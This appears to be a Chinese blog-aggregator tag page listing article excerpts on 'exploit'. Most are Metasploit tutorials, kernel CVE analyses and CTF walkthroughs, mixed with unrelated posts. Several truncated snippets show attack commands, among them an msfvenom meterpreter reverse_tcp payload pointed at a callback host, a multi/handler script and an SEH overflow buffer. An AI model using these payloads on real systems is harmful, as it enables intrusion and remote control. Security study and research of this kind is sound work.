Exploit 第13页

Exploit

MSF

撸代码的老师傅·2021-06-26 22:53

Word Power Made Easy 英语说文解字 Day 5

臭名昭著的骗子widelybutunfavorablyknownnotorietyn.恶名notus=出名的knownnoted著名的notedindustrialist知名的企业家notoriousexploiter

柳树发芽·2021-06-26 10:40

利用msf抓取密码，并用hash登录

msfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.3.136LPORT=12345-fexe>/root/test.exe2、反弹到kali启动msfuseexploit

BuFFERer·2021-06-25 11:16

Msf攻击案例

msf之ms10-087输入命令searchms10-087；使用这个模块：Useexploit/windows/fileformat/ms10_087_rtf_pfragments_bofimage.png

JyinP·2021-06-23 20:08

CVE-2019-13272 Linux本地提权漏洞复现

5.1.17测试主机信息：Linuxubuntu4.15.0-30-generic#32-UbuntuSMPThuJul2617:42:43UTC2018x86_64x86_64x86_64GNU/LinuxExploit

Cyc1e·2021-06-19 06:02

MSF 简单使用

msf>useexploit/windows/smb/cve_2017_8464_lnk_rcemsfexploit(cve_2017_8464_lnk_rce)>setpayloadwindows/x64

rmrfany·2021-06-15 07:02

heap exploit总结

第二次学习heapexploit，虽说走了弯路，第一次一知半解，知道为啥会走弯路，也是有价值的。相关资料总结：1。

clive0x·2021-06-13 23:10

【kernel exploit】BPF漏洞挖掘与CVE-2020-27194 整数溢出漏洞

影响版本：5.8.x内核分支，v5.8.15以及更低的版本。该分支的发行版：Fedora33、Ubuntu20.10。编译选项：CONFIG_BPF_SYSCALL。漏洞描述：eBPF验证程序中进行or操作时，scalar32_min_max_or()函数将64位的值赋值到32位的变量上，导致整数截断，进而错误计算了寄存器的范围，从而绕过bpf的检查，导致越界读写。补丁：patchscalar32

bsauce·2021-06-13 08:34

Drozer-Android安全测试

drozer可以帮助App和设备变得更安全，其提供了很多Android平台下的渗透测试exploit供你使用和分享。对于远程的exploit，它可以生成shellcode帮助你进行远程设备管理。

简简的我·2021-06-13 06:15

7M推荐系统 - S1 推荐系统和常用算法

->用户行为->关注和付费电商：浏览深度->用户行为->付费分层流量占比销量大于10000的占比多少9000到10000的占比多少多样性新颖性惊喜性推荐内物品不一样，推没见过的关注，与历史偏好不太一样Exploitation

左心Chris·2021-06-10 07:19

【kernel exploit】CVE-2021-31440 eBPF边界计算错误漏洞（Pwn2Own 2021）

测试版本：Linux-5.11exploit及测试环境下载地址—https://github.com/bsauce/kernel_exploit_factory编译选项：CONFIG_BPF_SYSCALL

bsauce·2021-06-09 14:50

How I Used a JSON Deserialization Oday to Steal Your Money on the Blockchain

TencentSecurityXuanwuLabZekaiWu|SecurityResearcher,TencentSecurityXuanwuLabFormat:40-MinuteBriefingsTracks:ExploitDevelo

菠萝科技·2021-05-29 07:33

【bsauce读论文】2021-USENIX-EXPRACE-采用中断机制来利用多变量竞争漏洞

本文提出的技术最开始在2020BlackHat上展示，名字叫ExploitingKernelRacesThroughTamingThreadInterleaving，今年又在2021USENIX会议上发表出来

bsauce·2021-05-26 21:53

忠告 & 基础

专业术语介绍渗透攻击（Exploit）渗透攻击是指由攻击者或渗透测试者利用一个系统、应用服务中的安全漏洞,所进行的攻击行为。攻击者使用渗透攻击去入侵系统时，往往会

椋鸟·2021-05-16 18:43

How to Exploit the Internet to Our Advantage

ItisuniversallyacknowledgedthatInternethasbecomeanecessaryandusefultoolineveryone’sdailylife.worldTakeanexampleofmine,throughInternet,Icaneasilyknowtomorrow’sweatherandpreparetheclotheswithoutinahurry

热A爱·2021-05-16 18:25

2018-04-02

newTraffickingofchildren(aka"ChildLabor"and"ChildExploitation)isaformofhumantraffickingandisdefinedasthe"recruitment

_______h·2021-05-09 13:58

逼格高的纯英文编程技术周刊《Guru Weekly》第1期

业界新闻RemotelyExploitableJavaZeroDayExploitsthroughDeserializationRedHatLinuxEnterpriseisReferencePlatformfor.NETCoreonLinuxLinuxRansomwaretargetingS

推酷·2021-05-09 07:32

kali下CVE_2017_7442利用实验

参考：https://www.exploit-db.com/exploits/42418/https://www.youtube.com/watch?

一点也不想吃辣·2021-05-08 18:10

二进制安全：转化大师漏洞复现：Boxoft Convert Master 1.3.0 - ‘wav‘ SEH Local Exploit

此次渗透测试针对软件转换大师BoxoftConvertMaster‘wav’SEH本地攻击实验平台：windows7poc由Achilles提供exp：importstructbuffer="\x41"*4132nseh="\xeb\x06\x90\x90"#jmpshort6seh=struct.pack('

鸿渐之翼·2021-05-04 20:10

003 内容推荐：探索与信息茧房

闫泽华·2021-05-04 17:47

渗透测试***漏洞检测工具命令行工具

blog.csdn.net/Jiajiajiang_/article/details/80742955MicrosoftWindows-'HTTP.sys'(PoC)(MS15-034)网站参考：https://www.exploit-db.com

幼姿沫·2021-05-04 15:50

2016年4月25，26日（乌托邦）

눈_눈Stellaris是瑞典工作室Paradox旗下又一4XRTS(eXplore,eXpand,eXploit,andeXterminateRealTimeStrategy)，杉果有售今天想要继续谈谈

上海王尔德·2021-05-01 22:28

Linux (x86) Exploit 开发系列教程之八绕过 ASLR -- 第三部分

绕过ASLR--第三部分译者：飞龙原文：BypassingASLR–PartIII预备条件：经典的基于栈的溢出绕过ASLR--第一部分VM配置：Ubuntu12.04(x86)在这篇文章中，让我们看看如何使用GOT覆盖和解引用技巧。来绕过共享库地址随机化。我们在第一部分中提到过，即使可执行文件没有所需的PLT桩代码，攻击者也可以使用GOT覆盖和解引用技巧来绕过ASLR。漏洞代码：//vuln.c#

布客飞龙·2021-05-01 17:08

第七章高级利用

7.1在Exploit-DB中搜索Web服务器的漏洞我们偶尔会在操作系统中，Web应用所使用的库中，以及

三月行者·2021-04-27 11:47

阿汪阿喵酱·2021-04-24 21:08

NBeanN·2021-04-21 19:34

Metasploit渗透测试（双脉冲星）

而且要保证两台机器之间可以ping通因为kali里面没有这个rb源代码所以我们要把这个模块导入进去我们先要smb模块下载到这里面#cd/usr/share/metasploit-framework/modules/exploits

落寞的鱼丶·2021-04-21 18:31

使用msf渗透安卓系统

然后打开msfconsolemsf>useexploit

二潘·2021-04-20 15:06

记一次比较蛋疼的渗透(getshell）

老规矩，对于这种已知CMS我都是先谷歌一下、或者是ExploitDB找一下有没有可以利用的漏洞EXP。ExploitDB结果谷歌结果经过搜索好像是有一个任意文件上传，但是利用EXP一把梭的时候

Nophone·2021-04-19 16:08

ctfshow反序列化

payload（有效攻击负载）是包含在你用于一次漏洞利用（exploit）中的ShellCode中的主要功能代码shellcode（可提权代码）对于一个漏洞来说，ShellCode就是一个用于某个漏洞的二进制代码框架

四代机您发多少·2021-04-18 15:13

记录一下渗透测试、安全漏洞类工具收藏及漏洞查询

zh-cn.tenable.com/products/nessusArachnihttps://www.arachni-scanner.com/Nmaphttp://www.nmap.com.cn/漏洞查询工具exploit-dbhttps

全栈坟坑·2021-04-13 10:32

模型剪枝

代表性的工作有：奇异值分解SVD(NIPS2014)：Exploitinglinearstructurewithinconvolutionalnetworksforefficientevaluation

加油11dd23·2021-04-09 02:48

【Vulnhub系列】DC3

文章目录基本信息实验过程额外补充利用php反弹shell使用Linux-Exploit-suggestion来辅助提权靶机下载地址：https://download.vulnhub.com/dc/DC-

大方子·2021-04-08 14:05

“百度杯”CTF比赛十二月场easypwn

“百度杯”CTF比赛十二月场easypwn前言一、程序分析二、漏洞利用exploit前言在这篇文章中将学习到泄露canary、ret2scu和ret2syscall一、程序分析从中可以看出该程序为64位动态链接的

红凳子·2021-04-04 22:00

CVPR 2021 Transformer Meets Tracker: Exploiting Temporal Context for Robust Visual Tracking

动机视觉目标跟踪是计算机视觉中的一项基本任务。尽管最近取得了一些进展，但由于遮挡、变形、外观变化等因素的影响，它仍然是一项具有挑战性的任务。在视频目标跟踪任务中，现有的跟踪器中被忽略了连续帧之间存在着丰富的时间上下文信息。方法为了在独立的视频帧之间建立桥梁，并传递丰富的时间线索。提出了一种新的transformer辅助跟踪框架。由于提出的transformer接收图像特征嵌入，共同将这些图像特征嵌

smile909·2021-03-28 22:13

Zico2靶机提点

接着搜一下exploit：照着操作，先建一个数据库命名为hack.php,然后写一个一句话木马，然后文件包含过去，然后蚁剑一连：这里有一个坑点，数据库里有俩用户密码都

·2021-03-23 01:09

【kernel exploit】CVE-2017-11176 竞态Double-Free漏洞调试

影响版本：Linux2.6.27~4.11.10范围很广。编译选项：CONFIG_SLAB=y（必须使用SLAB，Debian默认使用SLAB，Ubuntu默认使用SLUB）亲测编译SLUB也能利用成功，这一点不重要。Generalsetup--->ChooseSLABallocator(SLUB(UnqueuedAllocator))--->SLAB$wgethttps://mirrors.tu

bsauce·2021-02-24 12:35

【kernel exploit】CVE-2021-3156 sudo漏洞分析与利用

影响版本：1.9.0name为伪造库名；5.利用libc中的nss_load_library()函数来加载伪造库，执行伪造库中的_init函数（提权）。1.sudo简介sudo是可以允许管理员让普通用户执行root命令的1个工具，相当于su或者halt的命令，这样可以减少root登陆时间和管理，也可以提高linux系统的安全性。2.漏洞检测检测是否含有此漏洞：在非root权限下，运行命令$sudo

bsauce·2021-02-02 21:28

POC和EXP脚本

而EXP全称是Exploit，中文译作漏洞利用程序。它是对POC验证结果的一种漏洞利用脚本。编程基础因为市面上有关POC和EXP脚本的教程比较稀

平凡的学者·2021-01-25 17:50

【转】CCF2020问答匹配比赛：如何只用“bert”夺冠

-2/#sai-ti作者：看我干啥代码链接：https://github.com/xv44586/ccf_2020_qa_match[前言][赛题][QApair][QAPoint][Pattern-ExploitingTraining

致Great·2021-01-22 01:25

mysql 提权_MYSQL提权总结

一、利用mof提权前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQLWindowsRemoteSystemLevelExploit(Stuxnettechn

解忧子·2021-01-18 18:20

Kioptrix: Level 1.1和Kioptrix: Level 1.3靶机提点

Kioptrix:Level1.1总体来说没什么东西，根据注释提示sql注入密码进后台，之后命令拼接直接弹shell回来之后找exploit提权。

长安乱·2021-01-12 21:54

Bert MLM

具体的训练称之为Pattern-ExploitingTraini

得克特·2021-01-07 17:16

CTFshow 反序列化wp

2020-12-0220:03:53categories:ctfshowlink：https://yq1ng.github.io/说一些有的没的：payload（有效攻击负载）是包含在你用于一次漏洞利用（exploit

会下雪的晴天·2021-01-02 23:00

CVE-2020-11946 ManageEngine OpManager 命令执行

python2importrequestsimportsysimporturllib3importjsonurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)classOpManagerExploit

愛夕·2020-12-30 17:06

明明安装了模块/包，Python提示无包/模块/报错

起因我在某国外网站找到了一个Python脚本以实施Exploit，但是用Python运行时会提示找不到模块>>>import模块名Traceback(mostrecentcalllast):File""

SN-Grotesque·2020-12-29 01:54

msf rc脚本记录

useexploit/multi/handlersetPAYLOADwindows/meterpreter/reverse_tcpsetLHOST127.0.0.1setLPORT4444#自动进程迁移

Sp0n·2020-12-19 23:56

Quantization and Training of Neural Networks for Efficient Integer-Arithmetic-Only Inference笔记

【本篇中，中文的中括号里代表的是注释】解决方案主要分为两类：1.开发新的网络架构【exploitcomputationormemoryefficientoperations】【eg：MobileNetSqueezeNetShuffleNetDenseNet

木木阳·2020-12-16 12:55

CVE-2020-0796 Windows SMBv3 LPE Exploit POC 分析

作者：SungLin@知道创宇404实验室时间：2020年4月2日原文地址：https://paper.seebug.org/1164/0x00漏洞背景2020年3月12日微软确认在Windows10最新版本中存在一个影响SMBv3协议的严重漏洞，并分配了CVE编号CVE-2020-0796，该漏洞可能允许攻击者在SMB服务器或客户端上远程执行代码，3月13日公布了可造成BSOD的poc，3月30

创宇君·2020-12-15 19:57

上一页 9 10 11 12 13 14 15 16 下一页

按字母分类： A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 其他

推荐频道